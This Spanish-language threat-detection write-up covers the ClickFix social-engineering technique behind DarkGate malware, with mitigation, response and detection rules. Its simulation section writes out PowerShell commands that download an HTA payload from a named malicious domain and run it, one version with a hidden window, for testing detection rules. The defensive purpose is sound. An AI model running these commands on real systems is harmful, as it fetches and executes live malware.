Estudio de Caso de ClickFix: Malware DarkGate
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe describe un método de ingeniería social denominado ClickFix que persuade a los usuarios para que copien y ejecuten un comando de PowerShell, que luego descarga un archivo HTA malicioso. Este archivo HTA a su vez descarga componentes adicionales, incluyendo un script de AutoIt que crea directorios, deja caer archivos y establece comunicaciones C2. La actividad se atribuye a la campaña DarkGate y se basa en la ofuscación base64 más la manipulación del portapapeles para evitar una detección directa.
Investigación
Los analistas desentrañaron varias capas de contenido codificado en base64, incrustado en una página de advertencia de extensión de navegador falsa y recuperaron el comando de PowerShell responsable de obtener dark.hta desde linktoxic34.com. Cuando se ejecuta, el HTA despliega un ejecutable de AutoIt (fckhffh.a3x) que ejecuta una rutina DES y lanza más cargas útiles. La telemetría de red capturada muestra tráfico HTTP(S) hacia el dominio malicioso, seguido de la ejecución encadenada de scripts de PowerShell.
Mitigación
Las defensas recomendadas incluyen la capacitación de los usuarios para desalentar la copia de fragmentos de código desconocidos, deshabilitar el cuadro de diálogo Ejecutar de Windows a través de la Política de Grupo y desplegar soluciones antivirus basadas en comportamiento. Bloquear proactivamente el dominio malicioso y monitorear ejecuciones anómalas de PowerShell puede reducir significativamente el riesgo de infección de DarkGate.
Respuesta
Si se identifica un evento relacionado con ClickFix, aísle el endpoint afectado, detenga todos los procesos maliciosos, elimine los archivos HTA y AutoIt, y realice un análisis forense en cualquier carpeta creada durante la intrusión. Actualice la lógica de detección para señalar patrones de ejecución sospechosos de PowerShell y HTA y asegúrese de que el dominio asociado esté bloqueado en todo el entorno.
Flujo de Ataque
Detecciones
Comportamiento de evasión de defensa sospechoso de LOLBAS MSHTA detectando comandos asociados (a través de creación de procesos)
Ver
Cadenas de Powershell sospechosas (a través de powershell)
Ver
Binario AutoIT fue ejecutado desde una ubicación inusual (a través de creación de procesos)
Ver
Archivos sospechosos en el perfil público de usuario (a través de evento de archivo)
Ver
Ejecución sospechosa desde el perfil público de usuario (a través de creación de procesos)
Ver
Llamar métodos .NET sospechosos desde Powershell (a través de powershell)
Ver
IOCs (HashSha256) para detectar: ClickFix: DarkGate
Ver
Detección de Actividad Maliciosa de PowerShell para la Descarga de Archivos HTA [Conexión de Red de Windows]
Ver
Actividad Maliciosa de PowerShell Involucrando Ejecución de HTA y Manipulación del Portapapeles [Powershell de Windows]
Ver
Ejecución de Simulación
Requisito previo: La verificación previa de Telemetría & Baseline debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de Ataque y Comandos:
Un atacante que ha ganado acceso de bajo privilegio en un host de Windows comprometido desea descargar una carga útil HTA maliciosa utilizada en la campaña ClickFix. Para permanecer sigiloso, el atacante aprovecha PowerShell—una herramienta nativa de Windows—para que no se introduzcan binarios externos. El comando se ejecuta directamente en la consola (o a través de una tarea programada) e incluye la URL exacta que la regla vigila. La descarga se almacena en el%TEMP%del usuario y luego se ejecuta a través deStart-Process.$url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $out = "$env:TEMPdark.hta" Invoke-WebRequest -Uri $url -OutFile $out Start-Process -FilePath $out -
Script de prueba de regresión: (autónomo, reproduce los pasos anteriores)
# Simulación de descarga HTA de ClickFix – activa la regla Sigma $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $destPath = "$env:TEMPdark.hta" try { Write-Host "[*] Descargando carga útil HTA maliciosa..." Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing Write-Host "[+] Descarga completada. Ejecutando carga útil..." Start-Process -FilePath $destPath -WindowStyle Hidden } catch { Write-Error "Descarga o ejecución fallida: $_" } -
Comandos de limpieza: (elimina el HTA descargado y cualquier instancia en ejecución)
# Eliminar el archivo HTA y terminar cualquier proceso persistente $htaPath = "$env:TEMPdark.hta" if (Test-Path $htaPath) { Remove-Item $htaPath -Force Write-Host "[*] Archivo HTA eliminado." } # Terminar cualquier proceso que pueda haber sido lanzado desde el HTA (ejemplo genérico) Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force